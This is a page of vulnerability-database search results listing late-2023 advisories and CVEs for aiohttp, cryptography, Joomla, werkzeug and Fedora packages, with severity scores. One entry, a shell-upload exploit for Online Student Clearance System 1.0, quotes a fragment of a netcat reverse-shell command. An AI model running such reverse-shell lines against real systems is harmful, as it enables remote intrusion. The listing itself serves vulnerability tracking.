
12201 matches found

GithubExploit
added 2023/11/30 5:55 p.m. | 414 views

Exploit for Improper Access Control in Joomla Joomla!

This is a POC for CVE-2023-23752 written in Python...

CVSS 5.3 | AI score 6 | EPSS 0.94522
Exploits 42

Prion
added 2023/11/30 7:15 a.m. | 26 views

Design/Logic Flaw

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVSS 5 | AI score 6.8 | EPSS 0.00457
Exploits 1 | References 4 | Affected Software 1

OSV
added 2023/11/30 7:15 a.m. | 60 views

PYSEC-2023-250

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVSS 5.3 | AI score 5.1 | EPSS 0.00457
Exploits 1 | References 4

OSV
added 2023/11/30 6:56 a.m. | 24 views

CVE-2023-49081 aiohttp's ClientSession is vulnerable to CRLF injection via version

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVSS 7.2 | AI score 6.1 | EPSS 0.00457
Exploits 1 | References 8

CVE
added 2023/11/30 6:56 a.m. | 391 views

CVE-2023-49081

CVE-2023-49081 affects aiohttp (HTTP header/HTTP version validation issues) with remediation across multiple vendors: Debian advisories show fixes for python-aiohttp (Debian 11 bullseye: 3.7.4-1+deb11u1; DSA-5828-1 fixes to 3.8.4-1+deb12u1), IBM Storage Fusion bulletin requires upgrading to 2.8.0...

CVSS 7.2 | AI score 6 | EPSS 0.00457
Exploits 1 | References 6 | Affected Software 1

Debian CVE
added 2023/11/30 6:56 a.m. | 27 views

CVE-2023-49081

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVSS 7.2 | AI score 6.2 | EPSS 0.00457
Exploits 1

Cvelist
added 2023/11/30 6:56 a.m. | 29 views

CVE-2023-49081 aiohttp's ClientSession is vulnerable to CRLF injection via version

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation made it possible for an attacker to modify the HTTP request e.g. to insert a new header or create a new HTTP request if the attacker controls the HTTP version. The vulnerability only occurs if the...

CVSS 7.2 | AI score 7 | EPSS 0.00457
Exploits 1 | References 4

Fedora
added 2023/11/30 3:34 a.m. | 16 views

[SECURITY] Fedora 38 Update: python-gstreamer1-1.22.7-1.fc38

This module contains PyGObject overrides to make it easier to write applications that use GStreamer 1.x in Python...

CVSS 8.8 | AI score 6.8 | EPSS 0.05986
Exploits 0

0day.today
added 2023/11/30 12:0 a.m. | 530 views

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

CVSS 7.5 | AI score 7.4 | EPSS 0.00171
Exploits 4

IBM Security Bulletins
added 2023/11/29 8:20 p.m. | 64 views

Security Bulletin: Multiple security vulnerabilities are addressed with IBM Business Automation Manager Open Editions 8.0.4-IF001

Summary In addition to updates of open source dependencies, the following security vulnerabilities are addressed with IBM Business Automation Manager Open Editions 8.0.4-IF001. Vulnerability Details CVEID:CVE-2023-22025 DESCRIPTION: An unspecified vulnerability in Oracle Java SE, Oracle GraalVM...

CVSS 8.1 | AI score 9.5 | EPSS 0.94394
Exploits 48 | Affected Software 1

NVD
added 2023/11/29 8:15 p.m. | 25 views

CVE-2023-49082

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request e.g. insert a new header or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if th...

CVSS 5.3 | EPSS 0.00221
Exploits 1 | References 6

OSV
added 2023/11/29 8:15 p.m. | 41 views

PYSEC-2023-251

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request e.g. insert a new header or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if th...

CVSS 5.3 | AI score 5 | EPSS 0.00221
Exploits 1 | References 4

CVE
added 2023/11/29 8:7 p.m. | 368 views

CVE-2023-49082

CVE-2023-49082: aiohttp contains improper validation that can enable an attacker to modify the HTTP request (for example inserting headers) or create a new HTTP request when the attacker can control the HTTP method. The impact is described as enabling request modification and potential request s...

CVSS 5.3 | AI score 5.9 | EPSS 0.00221
Exploits 1 | References 6 | Affected Software 1

Cvelist
added 2023/11/29 8:7 p.m. | 25 views

CVE-2023-49082 aiohttp's ClientSession is vulnerable to CRLF injection via method

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request e.g. insert a new header or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if th...

CVSS 5.3 | AI score 6.1 | EPSS 0.00221
Exploits 1 | References 4

AlpineLinux
added 2023/11/29 7:15 p.m. | 30 views

CVE-2023-49083

cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service...

CVSS 7.5 | AI score 7.2 | EPSS 0.01255
Exploits 1

CVE
added 2023/11/29 6:50 p.m. | 388 views

CVE-2023-49083

The CVE-2023-49083 issue affects the Python package cryptography, where calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates can trigger a NULL dereference and segfault, leading to potential DoS during PKCS7 deserialization. Affected software is the Python cryptography library; impa...

CVSS 7.5 | AI score 6.7 | EPSS 0.01255
Exploits 1 | References 5 | Affected Software 1

Debian CVE
added 2023/11/29 6:50 p.m. | 103 views

CVE-2023-49083

cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service...

CVSS 7.5 | AI score 6.2 | EPSS 0.01255
Exploits 1

GithubExploit
added 2023/11/29 5:1 p.m. | 315 views

Exploit for Improper Access Control in Joomla Joomla!

Usage...

CVSS 5.3 | AI score 6 | EPSS 0.94522
Exploits 42

RedHat Linux
added 2023/11/29 12:12 p.m. | 5 views

python-werkzeug: high resource consumption leading to denial of service

A resource consumption flaw was found in python-werkzeug. If a specially crafted file is uploaded by a remote attacker, it may cause a denial of service...

CVSS 8 | AI score 7.1 | EPSS 0.00878
Exploits 0 | References 6

Fedora
added 2023/11/29 1:39 a.m. | 29 views

[SECURITY] Fedora 37 Update: python-geopandas-0.14.1-1.fc37

GeoPandas is a project to add support for geographic data to Pandas objects. The goal of GeoPandas is to make working with geospatial data in Python easier. It combines the capabilities of Pandas and Shapely, providing geospatial operations in Pandas and a high-level interface to multiple...

CVSS 9.8 | AI score 9.5 | EPSS 0.84819
Exploits 0